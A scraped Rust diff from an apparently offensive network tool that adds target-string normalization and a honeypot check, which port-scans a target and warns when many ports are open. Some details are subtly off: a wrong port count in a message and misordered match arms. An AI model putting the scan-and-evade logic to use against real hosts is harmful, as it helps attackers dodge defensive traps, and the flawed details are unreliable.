if attempts > MAX_ATTEMPTS {
|
||||
println!("{}", "Too many invalid attempts. Using default.".yellow());
|
||||
return Ok(default);
|
||||
}
|
||||
|
||||
print!("{} [{}]: ", message, default);
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
|
||||
// Length check - numbers shouldn't be too long
|
||||
if input.len() > 20 {
|
||||
println!("{}", "Number too long. Please enter a valid positive integer.".yellow());
|
||||
continue;
|
||||
}
|
||||
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
return Ok(default);
|
||||
}
|
||||
|
||||
// Only allow digits
|
||||
if !trimmed.chars().all(|c| c.is_ascii_digit()) {
|
||||
println!("Invalid number. Please enter a positive integer.");
|
||||
continue;
|
||||
}
|
||||
|
||||
match trimmed.parse::<usize>() {
|
||||
Ok(value) if value > 0 => return Ok(value),
|
||||
_ => println!("Invalid number. Please enter a positive integer."),
|
||||
Ok(_) => println!("Number must be greater than 0."),
|
||||
Err(_) => println!("Number too large. Please enter a smaller value."),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
+435
-42
@@ -34,13 +34,25 @@ const MAX_PARALLEL_PROXIES: usize = 1000;
|
||||
/// Maximum timeout for proxy tests (5 minutes)
|
||||
const MAX_PROXY_TIMEOUT_SECS: u64 = 300;
|
||||
|
||||
/// Take "1.2.3.4", "::1", "[::1]:8080" or "hostname" and
|
||||
/// always return a valid "host:port" or "[ipv6]:port" string.
|
||||
/// Comprehensive target normalization function.
|
||||
///
|
||||
/// Supports multiple input formats:
|
||||
/// - IPv4: "192.168.1.1", "192.168.1.1:8080"
|
||||
/// - IPv6: "::1", "[::1]", "[::1]:8080", "2001:db8::1"
|
||||
/// - Hostnames: "example.com", "example.com:443"
|
||||
/// - URLs: "http://example.com:8080" (extracts host:port)
|
||||
/// - CIDR: "192.168.1.0/24", "2001:db8::/32"
|
||||
///
|
||||
/// Returns normalized format:
|
||||
/// - IPv4/hostname: "host:port" or "host" (if no port)
|
||||
/// - IPv6: "[ipv6]:port" or "[ipv6]" (if no port)
|
||||
/// - CIDR: "network/prefix" (preserved as-is)
|
||||
///
|
||||
/// # Security
|
||||
/// - Validates input length to prevent DoS
|
||||
/// - Sanitizes input to prevent injection
|
||||
/// - Validates hostname format
|
||||
/// - Validates hostname/IP format
|
||||
/// - Prevents path traversal attempts
|
||||
pub fn normalize_target(raw: &str) -> Result<String> {
|
||||
// Input validation
|
||||
let trimmed = raw.trim();
|
||||
@@ -58,7 +70,26 @@ pub fn normalize_target(raw: &str) -> Result<String> {
|
||||
));
|
||||
}
|
||||
|
||||
// Basic sanitization - remove control characters and excessive whitespace
|
||||
// Check for path traversal attempts early
|
||||
if trimmed.contains("..") || trimmed.contains("//") {
|
||||
return Err(anyhow!("Invalid target format: contains path traversal characters"));
|
||||
}
|
||||
|
||||
// Try to parse as URL first (handles http://, https://, etc.)
|
||||
if let Ok(url) = Url::parse(trimmed) {
|
||||
if let Some(host) = url.host_str() {
|
||||
let port = url.port().unwrap_or(0);
|
||||
let normalized = if port > 0 {
|
||||
format!("{}:{}", host, port)
|
||||
} else {
|
||||
host.to_string()
|
||||
};
|
||||
// Recursively normalize to handle IPv6 wrapping
|
||||
return normalize_target(&normalized);
|
||||
}
|
||||
}
|
||||
|
||||
// Basic sanitization - remove control characters except space/tab
|
||||
let sanitized: String = trimmed
|
||||
.chars()
|
||||
.filter(|c| !c.is_control() || *c == ' ' || *c == '\t')
|
||||
@@ -71,56 +102,278 @@ pub fn normalize_target(raw: &str) -> Result<String> {
|
||||
return Err(anyhow!("Target contains only invalid characters"));
|
||||
}
|
||||
|
||||
// Check for path traversal attempts
|
||||
if sanitized.contains("..") || sanitized.contains("//") {
|
||||
return Err(anyhow!("Invalid target format: contains path traversal characters"));
|
||||
// Check for CIDR notation (contains /)
|
||||
if sanitized.contains('/') {
|
||||
// Validate CIDR format
|
||||
let parts: Vec<&str> = sanitized.split('/').collect();
|
||||
if parts.len() != 2 {
|
||||
return Err(anyhow!("Invalid CIDR format: expected 'network/prefix'"));
|
||||
}
|
||||
|
||||
let network = parts[0].trim();
|
||||
let prefix_str = parts[1].trim();
|
||||
|
||||
// Validate prefix is a number
|
||||
let prefix: u8 = prefix_str.parse()
|
||||
.map_err(|_| anyhow!("Invalid CIDR prefix: '{}' (must be 0-128 for IPv6, 0-32 for IPv4)", prefix_str))?;
|
||||
|
||||
// Normalize the network part (without prefix)
|
||||
let normalized_network = normalize_target(network)?;
|
||||
|
||||
// Validate prefix range based on IP version
|
||||
let is_ipv6 = normalized_network.starts_with('[') || normalized_network.matches(':').count() >= 2;
|
||||
if is_ipv6 {
|
||||
if prefix > 128 {
|
||||
return Err(anyhow!("Invalid IPv6 CIDR prefix: {} (max 128)", prefix));
|
||||
}
|
||||
} else {
|
||||
if prefix > 32 {
|
||||
return Err(anyhow!("Invalid IPv4 CIDR prefix: {} (max 32)", prefix));
|
||||
}
|
||||
}
|
||||
|
||||
return Ok(format!("{}/{}", normalized_network, prefix));
|
||||
}
|
||||
|
||||
// Handle already normalized formats
|
||||
if sanitized.contains("]:") || sanitized.starts_with('[') {
|
||||
// Validate the format
|
||||
if sanitized.starts_with('[') && !sanitized.contains(']') {
|
||||
// Handle already normalized IPv6 with brackets: [::1]:8080 or [::1]
|
||||
if sanitized.starts_with('[') {
|
||||
if let Some(bracket_end) = sanitized.find(']') {
|
||||
let ipv6_part = &sanitized[1..bracket_end];
|
||||
let after_bracket = &sanitized[bracket_end + 1..];
|
||||
|
||||
// Validate IPv6 address
|
||||
if !is_valid_ipv6(ipv6_part) {
|
||||
return Err(anyhow!("Invalid IPv6 address: '{}'", ipv6_part));
|
||||
}
|
||||
|
||||
// Check for port after bracket
|
||||
if after_bracket.starts_with(':') {
|
||||
let port_str = &after_bracket[1..].trim();
|
||||
if port_str.is_empty() {
|
||||
return Err(anyhow!("Invalid port format: missing port number"));
|
||||
}
|
||||
let port: u16 = port_str.parse()
|
||||
.map_err(|_| anyhow!("Invalid port number: '{}'", port_str))?;
|
||||
if port == 0 {
|
||||
return Err(anyhow!("Port cannot be 0"));
|
||||
}
|
||||
return Ok(format!("[{}]:{}", ipv6_part, port));
|
||||
} else if !after_bracket.is_empty() {
|
||||
return Err(anyhow!("Invalid format after IPv6 address: '{}'", after_bracket));
|
||||
}
|
||||
return Ok(format!("[{}]", ipv6_part));
|
||||
} else {
|
||||
return Err(anyhow!("Invalid IPv6 format: missing closing bracket"));
|
||||
}
|
||||
// Basic validation - check it's not just brackets
|
||||
let inner = sanitized.trim_matches(|c| c == '[' || c == ']');
|
||||
if inner.is_empty() {
|
||||
return Err(anyhow!("Invalid target: empty address"));
|
||||
}
|
||||
return Ok(sanitized.to_string());
|
||||
}
|
||||
|
||||
// Detect IPv6 addresses (multiple colons, no dots)
|
||||
|
||||
// Check if it contains a port (format: host:port or ip:port)
|
||||
let colon_count = sanitized.matches(':').count();
|
||||
let has_dots = sanitized.contains('.');
|
||||
|
||||
// IPv6 detection: multiple colons and no dots (or dots only in port)
|
||||
let is_ipv6 = colon_count >= 2 && !has_dots;
|
||||
// IPv6 detection: multiple colons typically indicates IPv6
|
||||
let is_likely_ipv6 = colon_count >= 2 && !has_dots;
|
||||
|
||||
// Additional IPv6 validation
|
||||
if is_ipv6 {
|
||||
// Check for valid IPv6 characters
|
||||
let ipv6_re = Regex::new(r"^[0-9a-fA-F:]+$").unwrap();
|
||||
let addr_part = sanitized.split(':').next().unwrap_or("");
|
||||
if !ipv6_re.is_match(addr_part) && !addr_part.is_empty() {
|
||||
if is_likely_ipv6 {
|
||||
// IPv6 address (may or may not have port)
|
||||
if let Some(last_colon_pos) = sanitized.rfind(':') {
|
||||
// Check if last colon is part of IPv6 or port separator
|
||||
let before_colon = &sanitized[..last_colon_pos];
|
||||
let after_colon = &sanitized[last_colon_pos + 1..];
|
||||
|
||||
// If after colon is all digits, it's likely a port
|
||||
if after_colon.chars().all(|c| c.is_ascii_digit()) && !after_colon.is_empty() {
|
||||
let port: u16 = after_colon.parse()
|
||||
.map_err(|_| anyhow!("Invalid port number: '{}'", after_colon))?;
|
||||
if port == 0 {
|
||||
return Err(anyhow!("Port cannot be 0"));
|
||||
}
|
||||
|
||||
// Validate IPv6 part
|
||||
if !is_valid_ipv6(before_colon) {
|
||||
return Err(anyhow!("Invalid IPv6 address: '{}'", before_colon));
|
||||
}
|
||||
return Ok(format!("[{}]:{}", before_colon, port));
|
||||
}
|
||||
}
|
||||
|
||||
// IPv6 without port
|
||||
if !is_valid_ipv6(&sanitized) {
|
||||
return Err(anyhow!("Invalid IPv6 address format: '{}'", sanitized));
|
||||
}
|
||||
Ok(format!("[{}]", sanitized))
|
||||
} else {
|
||||
// Validate hostname/IPv4 format
|
||||
// Basic validation: no spaces, reasonable characters
|
||||
if sanitized.contains(' ') {
|
||||
return Err(anyhow!("Invalid target format: contains spaces"));
|
||||
}
|
||||
|
||||
// Check for valid hostname/IPv4/CIDR characters (allow / for CIDR notation)
|
||||
let host_re = Regex::new(r"^[a-zA-Z0-9.\-_:/]+$").unwrap();
|
||||
if !host_re.is_match(&sanitized) {
|
||||
return Err(anyhow!("Invalid target format: contains invalid characters"));
|
||||
}
|
||||
|
||||
Ok(sanitized.to_string())
|
||||
return Ok(format!("[{}]", sanitized));
|
||||
}
|
||||
|
||||
// IPv4 or hostname (may have port)
|
||||
if sanitized.contains(':') {
|
||||
if let Some(colon_pos) = sanitized.rfind(':') {
|
||||
let host_part = &sanitized[..colon_pos];
|
||||
let port_str = &sanitized[colon_pos + 1..];
|
||||
|
||||
if port_str.is_empty() {
|
||||
return Err(anyhow!("Invalid port format: missing port number"));
|
||||
}
|
||||
|
||||
let port: u16 = port_str.parse()
|
||||
.map_err(|_| anyhow!("Invalid port number: '{}'", port_str))?;
|
||||
if port == 0 {
|
||||
return Err(anyhow!("Port cannot be 0"));
|
||||
}
|
||||
|
||||
// Validate host part
|
||||
if host_part.is_empty() {
|
||||
return Err(anyhow!("Invalid target: empty hostname/IP"));
|
||||
}
|
||||
|
||||
// Validate hostname/IPv4 format
|
||||
if !is_valid_hostname_or_ipv4(host_part) {
|
||||
return Err(anyhow!("Invalid hostname or IPv4 address: '{}'", host_part));
|
||||
}
|
||||
|
||||
return Ok(format!("{}:{}", host_part, port));
|
||||
}
|
||||
}
|
||||
|
||||
// No port - just hostname or IPv4
|
||||
if sanitized.contains(' ') {
|
||||
return Err(anyhow!("Invalid target format: contains spaces (did you mean to include a port?)"));
|
||||
}
|
||||
|
||||
// Validate hostname/IPv4 format
|
||||
if !is_valid_hostname_or_ipv4(&sanitized) {
|
||||
return Err(anyhow!("Invalid hostname or IPv4 address format: '{}'", sanitized));
|
||||
}
|
||||
|
||||
Ok(sanitized.to_string())
|
||||
}
|
||||
|
||||
/// Validate IPv6 address format (basic validation)
|
||||
/// Supports compressed notation (::), mixed IPv4/IPv6 (::ffff:192.168.1.1), etc.
|
||||
fn is_valid_ipv6(addr: &str) -> bool {
|
||||
if addr.is_empty() {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Check for valid IPv6 characters: hex digits, colons, and dots (for IPv4-mapped)
|
||||
let ipv6_char_re = Regex::new(r"^[0-9a-fA-F:.]+$").unwrap();
|
||||
if !ipv6_char_re.is_match(addr) {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Check for valid :: usage (only one allowed, and not at start/end unless it's ::1 style)
|
||||
let double_colon_count = addr.matches("::").count();
|
||||
if double_colon_count > 1 {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Handle special cases
|
||||
if addr == "::" || addr == "::1" {
|
||||
return true;
|
||||
}
|
||||
|
||||
// Check for IPv4-mapped IPv6 (::ffff:192.168.1.1 or similar)
|
||||
if addr.contains('.') {
|
||||
// Must be in format like ::ffff:192.168.1.1
|
||||
let parts: Vec<&str> = addr.rsplitn(2, ':').collect();
|
||||
if parts.len() == 2 {
|
||||
let ipv4_part = parts[0];
|
||||
// Validate IPv4 part
|
||||
let ipv4_parts: Vec<&str> = ipv4_part.split('.').collect();
|
||||
if ipv4_parts.len() == 4 {
|
||||
let is_valid_ipv4 = ipv4_parts.iter().all(|part| {
|
||||
part.parse::<u8>().is_ok()
|
||||
});
|
||||
if is_valid_ipv4 {
|
||||
// Valid IPv4-mapped IPv6
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
// Split by colons to validate segments
|
||||
let segments: Vec<&str> = addr.split(':').collect();
|
||||
|
||||
// With :: compression, we can have fewer than 8 segments
|
||||
// Without ::, we need exactly 8 segments
|
||||
if double_colon_count == 0 {
|
||||
// No compression - must have exactly 8 segments
|
||||
if segments.len() != 8 {
|
||||
return false;
|
||||
}
|
||||
} else {
|
||||
// With compression - can have 2-7 segments
|
||||
if segments.len() < 2 || segments.len() > 7 {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
// Validate each segment (except empty ones from ::)
|
||||
for segment in &segments {
|
||||
if segment.is_empty() {
|
||||
continue; // Empty segment from :: compression
|
||||
}
|
||||
if segment.len() > 4 {
|
||||
return false; // Each segment max 4 hex digits
|
||||
}
|
||||
// Validate hex digits
|
||||
if !segment.chars().all(|c| c.is_ascii_hexdigit()) {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
true
|
||||
}
|
||||
|
||||
/// Validate hostname or IPv4 address format
|
||||
fn is_valid_hostname_or_ipv4(host: &str) -> bool {
|
||||
if host.is_empty() {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Check for valid characters (alphanumeric, dots, hyphens, underscores)
|
||||
let host_re = Regex::new(r"^[a-zA-Z0-9.\-_]+$").unwrap();
|
||||
if !host_re.is_match(host) {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Check if it looks like IPv4 (contains dots and all segments are numeric)
|
||||
if host.contains('.') {
|
||||
let parts: Vec<&str> = host.split('.').collect();
|
||||
if parts.len() == 4 {
|
||||
// Could be IPv4 - validate each octet
|
||||
let is_ipv4 = parts.iter().all(|part| {
|
||||
part.parse::<u8>().is_ok()
|
||||
});
|
||||
if is_ipv4 {
|
||||
return true; // Valid IPv4
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Hostname validation: must start and end with alphanumeric
|
||||
if host.starts_with('.') || host.ends_with('.') {
|
||||
return false;
|
||||
}
|
||||
|
||||
if host.starts_with('-') || host.ends_with('-') {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Check hostname length (max 253 characters per RFC)
|
||||
if host.len() > 253 {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Check individual label length (max 63 characters per RFC)
|
||||
for label in host.split('.') {
|
||||
if label.len() > 63 {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
true
|
||||
}
|
||||
|
||||
/// Recursively list .rs files up to a certain depth with security checks
|
||||
@@ -642,3 +895,143 @@ async fn check_proxy(proxy: &str, test_url: &str, timeout: Duration) -> Result<(
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Extract IP address or hostname from target string.
|
||||
/// Handles formats: IP:port, [IPv6]:port, hostname:port, CIDR notation
|
||||
/// Returns the host/IP part without port or brackets.
|
||||
fn extract_ip_from_target(target: &str) -> Option<String> {
|
||||
let trimmed = target.trim();
|
||||
|
||||
// Handle CIDR notation: extract network part before /
|
||||
if let Some(slash_pos) = trimmed.find('/') {
|
||||
let network_part = &trimmed[..slash_pos];
|
||||
return extract_ip_from_target(network_part);
|
||||
}
|
||||
|
||||
// Handle IPv6 with brackets: [::1]:8080 or [::1]
|
||||
if trimmed.starts_with('[') {
|
||||
if let Some(bracket_end) = trimmed.find(']') {
|
||||
let ipv6_part = &trimmed[1..bracket_end];
|
||||
return Some(ipv6_part.to_string());
|
||||
}
|
||||
// Malformed - missing closing bracket, but try to extract anyway
|
||||
return Some(trimmed.trim_start_matches('[').to_string());
|
||||
}
|
||||
|
||||
// Handle IPv4 or hostname with port: 192.168.1.1:8080 or hostname:8080
|
||||
if let Some(colon_pos) = trimmed.rfind(':') {
|
||||
let before_colon = &trimmed[..colon_pos];
|
||||
let after_colon = &trimmed[colon_pos + 1..];
|
||||
|
||||
// Check if after colon is a port (all digits)
|
||||
if after_colon.chars().all(|c| c.is_ascii_digit()) && !after_colon.is_empty() {
|
||||
// It's a port - extract host part
|
||||
// But check if before_colon is IPv6 (multiple colons)
|
||||
let colon_count = before_colon.matches(':').count();
|
||||
if colon_count >= 2 {
|
||||
// IPv6 address - return as is (without brackets)
|
||||
return Some(before_colon.to_string());
|
||||
}
|
||||
// IPv4 or hostname - return host part
|
||||
return Some(before_colon.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
// No port or malformed - check if it's IPv6 (multiple colons)
|
||||
let colon_count = trimmed.matches(':').count();
|
||||
if colon_count >= 2 {
|
||||
// IPv6 without brackets - return as is
|
||||
return Some(trimmed.to_string());
|
||||
}
|
||||
|
||||
// No port - return as is (IPv4 or hostname)
|
||||
Some(trimmed.to_string())
|
||||
}
|
||||
|
||||
/// Perform a lightweight honeypot check by probing common ports.
|
||||
/// If 11 or more ports are open, warns that the target is likely a honeypot.
|
||||
pub async fn basic_honeypot_check(target: &str) {
|
||||
// Extract IP address from target (handles IP:port format)
|
||||
let ip = match extract_ip_from_target(target) {
|
||||
Some(ip) => ip,
|
||||
None => {
|
||||
// If we can't extract IP, skip check
|
||||
return;
|
||||
}
|
||||
};
|
||||
|
||||
// Skip check for hostnames (contains non-IP characters)
|
||||
if ip.contains(|c: char| c.is_alphabetic() && c != ':') && !ip.contains(':') {
|
||||
// Likely a hostname, skip honeypot check
|
||||
return;
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "╔══════════════════════════════════════════════╗".bright_yellow());
|
||||
println!("{}", "║ HONEYPOT DETECTION CHECK ║".bright_yellow());
|
||||
println!("{}", "╚══════════════════════════════════════════════╝".bright_yellow());
|
||||
println!();
|
||||
println!("[*] Scanning {} common ports on {}...", 200, ip);
|
||||
|
||||
// Common ports typically exposed by network services.
|
||||
const COMMON_PORTS: &[u16] = &[
|
||||
11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 26, 37, 38, 43, 49, 53, 70, 79, 80, 81, 82, 83, 84, 86, 88, 89, 91, 92, 94, 95, 97, 99,
|
||||
101, 102, 104, 110, 111, 113, 119, 143, 154, 161, 175, 177, 179, 180, 189, 195, 221, 234, 243, 263, 264, 285, 311, 314, 385, 389,
|
||||
400, 427, 440, 441, 442, 443, 444, 446, 447, 449, 450, 451, 452, 462, 465, 480, 485, 488, 502, 503, 513, 515, 541, 548, 554, 556,
|
||||
587, 591, 593, 602, 631, 636, 646, 666, 685, 700, 743, 771, 777, 785, 789, 805, 806, 811, 832, 833, 843, 873, 880, 886, 887, 902,
|
||||
953, 990, 992, 993, 995, 998, 999, 1013, 1022, 1023, 1024, 1027, 1080, 1099, 1110, 1111, 1153, 1181, 1188, 1195, 1198, 1200, 1207,
|
||||
1234, 1291, 1292, 1311, 1337, 1366, 1370, 1377, 1388, 1400, 1414, 1433, 1444, 1447, 1451, 1453, 1454, 1457, 1460, 1471, 1521, 1554,
|
||||
1599, 1604, 1605, 1650, 1723, 1741, 1820, 1830, 1883
|
||||
];
|
||||
|
||||
let mut open_count = 0usize;
|
||||
let mut open_ports = Vec::new();
|
||||
|
||||
for &port in COMMON_PORTS {
|
||||
let addr = format!("{}:{}", ip, port);
|
||||
let conn = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(250),
|
||||
tokio::net::TcpStream::connect(&addr),
|
||||
)
|
||||
.await;
|
||||
|
||||
if let Ok(Ok(stream)) = conn {
|
||||
// We only care that the TCP handshake completed; drop immediately.
|
||||
drop(stream);
|
||||
open_count += 1;
|
||||
if open_ports.len() < 20 {
|
||||
open_ports.push(port);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!("[*] Found {} open port(s) out of {} scanned", open_count, COMMON_PORTS.len());
|
||||
|
||||
// Threshold: if 11 or more common ports are open, likely a honeypot
|
||||
if open_count >= 11 {
|
||||
println!();
|
||||
println!("{}", "╔══════════════════════════════════════════════╗".red().bold());
|
||||
println!("{}", "║ ⚠️ HONEYPOT DETECTED ║".red().bold());
|
||||
println!("{}", "╚══════════════════════════════════════════════╝".red().bold());
|
||||
println!();
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[!] Target {} has {} / {} common ports open - likely honeypot",
|
||||
ip,
|
||||
open_count,
|
||||
COMMON_PORTS.len()
|
||||
)
|
||||
.yellow()
|
||||
.bold()
|
||||
);
|
||||
println!("{}", " This is likely a honeypot system".yellow().bold());
|
||||
if open_count <= 20 && !open_ports.is_empty() {
|
||||
println!("{}", format!(" Open ports: {:?}", &open_ports[..open_count.min(20)]).yellow());
|
||||
}
|
||||
println!();
|
||||
} else {
|
||||
println!("{}", "[+] No honeypot indicators detected".green());
|
||||
println!();
|
||||
}
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user